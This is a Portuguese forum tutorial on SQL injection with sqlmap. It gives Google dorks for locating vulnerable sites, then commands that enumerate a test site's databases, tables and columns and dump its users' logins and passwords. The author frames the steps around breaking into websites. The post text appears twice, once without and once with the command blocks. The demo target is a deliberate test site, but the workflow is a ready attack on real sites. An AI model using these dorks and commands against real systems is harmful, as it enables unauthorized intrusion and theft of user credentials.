Eae galera, beleza? Sou novo aqui no fórum, e não MUITO experiente nesse assunto, mas vou ensinar oq sei
Vou ensinar o BASICO de SQLMAP, ou seja, o básico que você precisa pra conseguir dados de um site vulnerável a SQLi..
Para começar, vamos aprender a achar um site vulnerável.. Um método muito útil e prático, é usando o Google, através de Google Dorks.. Esse método é conhecido como Google Hacking.
Uma forma fácil de achar vulnerabilidades em sites do Google, é digitando a dork allinurl ou inurl junto com o parâmetro mais comum nas falhas de SQLi, o parâmetro ID.
Antes de .php você pode colocar algumas paginas comuns, como index, noticias, news e etc...
Para esse tutorial, vou usar um site que foi feito justamente para testes, o site da Vulnweb. (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...). Vamos achar uma vulnerabilidade!
Uma vulnerabilidade que pode ser encontrada no site é na barra de pesquisa. Ao digitar algo, o site retorna a seguinte URL:
Vemos que no site, temos o parâmetro 'test', e vamos ver se ele está vulnerável. Para isso, basta colocarmos uma aspas simples no final da URL, ficando assim:
Não vou explicar a teoria por que esse tutorial é bem básico e prático, mas tem vários cursos por ai que você aprende tudo na base da teoria..
Se o site retornar este erro, ou algo parecido, o site PODE estar vulnerável:
Sabendo que o site está vulneravel, vamos ao SQLMAP
Você pode utilizar tanto em sistemas Windows, como em Ubuntu, e ambos vão estar disponiveis para download no final do tutorial. Não esqueça que nos dois casos, é nescessario a instalação do Python.
No Windows, recomendo extrair no diretório C:, para ficar mais facil de utilizarmos.
Se você usa windows, aperte a tecla Host + R (ou abra o executar) e digite cmd.exe, em seguida aperte Enter.
No Prompt de comando, digite "cd \sqlmap" e a tela deve ser como a seguinte:
Feito tudo isso, digite:
Note que no SQLMAP não usamos a aspas simples, apenas a URL vulnerável.
O resultado deve ser esse:
Se usar o mesmo site que eu, o resultado deve ser as mesmas databases, se for outro site, pode mudar...
Feito isso, vamos conseguir as tabelas da database desejada, no caso a "acuart"
O que eu fiz, foi dizer que quero pegas as tabelas (--tables) da database 'acuart' (-D acuart)
OBS: O -D deve ser maiusculo!
E o resultado deve ser este:
Se você realmente que invadir o site, é ÓBVIO que vai se interessar pela tabela 'users', certo?
Então vamos ver o que tem nela, usando o comando:
O que fiz, foi novamente dizer que eu quero as colunas (--columns) da tabela 'users' (-T users) da database 'acuart' (-D acuart). Parece complicado mas é bem simples.
Feito isso, o resultado deve ser:
Perceba que o SQLMAP nos retorna uma série de colunas, e novamente pergunto, se realmente quer invadir o site, o que te interessa? É óbvio que o login e a senha.
Então vamos pegar os dados de uname(login) e pass(senha):
Desta vez, eu pedi as colunas os dados das colunas uname e pass(-C "uname,pass") da tabela 'users' da database 'acuart'.
E após tudo isso, ele nos retorna o usuario e senha.. Simples, não?
Bom, é isso. Espero que tenham gostado, lembrando que esse tutorial foi feito por mim, ou seja, deu um trabalinho .-.
Se for copiar, pelo menos coloca os créditos, por favor ? Custa nada tio .--------.
Poderia deixar seu 'obrigado' para me ajudar ? Se eu te ajudei, pq nn me ajudar tbm ?
Valeu, abrçs
Vou ensinar o BASICO de SQLMAP, ou seja, o básico que você precisa pra conseguir dados de um site vulnerável a SQLi..
Para começar, vamos aprender a achar um site vulnerável.. Um método muito útil e prático, é usando o Google, através de Google Dorks.. Esse método é conhecido como Google Hacking.
Uma forma fácil de achar vulnerabilidades em sites do Google, é digitando a dork allinurl ou inurl junto com o parâmetro mais comum nas falhas de SQLi, o parâmetro ID.
Código:
allinurl:".php?id=" ou inurl:".php?id="
Antes de .php você pode colocar algumas paginas comuns, como index, noticias, news e etc...
Para esse tutorial, vou usar um site que foi feito justamente para testes, o site da Vulnweb. (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...). Vamos achar uma vulnerabilidade!
Uma vulnerabilidade que pode ser encontrada no site é na barra de pesquisa. Ao digitar algo, o site retorna a seguinte URL:
Código:
http://testphp.vulnweb.com/search.php?test=query
Vemos que no site, temos o parâmetro 'test', e vamos ver se ele está vulnerável. Para isso, basta colocarmos uma aspas simples no final da URL, ficando assim:
Código:
http://testphp.vulnweb.com/search.php?test=query == http://testphp.vulnweb.com/search.php?test=query'
Não vou explicar a teoria por que esse tutorial é bem básico e prático, mas tem vários cursos por ai que você aprende tudo na base da teoria..
Se o site retornar este erro, ou algo parecido, o site PODE estar vulnerável:
Sabendo que o site está vulneravel, vamos ao SQLMAP
Você pode utilizar tanto em sistemas Windows, como em Ubuntu, e ambos vão estar disponiveis para download no final do tutorial. Não esqueça que nos dois casos, é nescessario a instalação do Python.
No Windows, recomendo extrair no diretório C:, para ficar mais facil de utilizarmos.
Se você usa windows, aperte a tecla Host + R (ou abra o executar) e digite cmd.exe, em seguida aperte Enter.
No Prompt de comando, digite "cd \sqlmap" e a tela deve ser como a seguinte:
Feito tudo isso, digite:
Código:
> sqlmap.py --url "SITE VULNERAVEL" --dbs //No nosso caso, vai ser: > sqlmap.py --url "http://testphp.vulnweb.com/search.php?test=query" --dbs
Note que no SQLMAP não usamos a aspas simples, apenas a URL vulnerável.
O resultado deve ser esse:
Se usar o mesmo site que eu, o resultado deve ser as mesmas databases, se for outro site, pode mudar...
Feito isso, vamos conseguir as tabelas da database desejada, no caso a "acuart"
Código:
> sqlmap.py --url "http://testphp.vulnweb.com/search.php?test=query" -D acuart --tables
O que eu fiz, foi dizer que quero pegas as tabelas (--tables) da database 'acuart' (-D acuart)
OBS: O -D deve ser maiusculo!
E o resultado deve ser este:
Se você realmente que invadir o site, é ÓBVIO que vai se interessar pela tabela 'users', certo?
Então vamos ver o que tem nela, usando o comando:
Código:
> sqlmap.py --url "http://testphp.vulnweb.com/search.php?test=query" -D acuart -T users --columns
Feito isso, o resultado deve ser:
Perceba que o SQLMAP nos retorna uma série de colunas, e novamente pergunto, se realmente quer invadir o site, o que te interessa? É óbvio que o login e a senha.
Então vamos pegar os dados de uname(login) e pass(senha):
Código:
> sqlmap.py --url "http://testphp.vulnweb.com/search.php?test=query" -D acuart -T users -C "uname,pass" --dump
Desta vez, eu pedi as colunas os dados das colunas uname e pass(-C "uname,pass") da tabela 'users' da database 'acuart'.
E após tudo isso, ele nos retorna o usuario e senha.. Simples, não?
Bom, é isso. Espero que tenham gostado, lembrando que esse tutorial foi feito por mim, ou seja, deu um trabalinho .-.
Se for copiar, pelo menos coloca os créditos, por favor ? Custa nada tio .--------.
Poderia deixar seu 'obrigado' para me ajudar ? Se eu te ajudei, pq nn me ajudar tbm ?
Valeu, abrçs
Código:
DOWNLOADS: Python:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... SQLMap: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Comment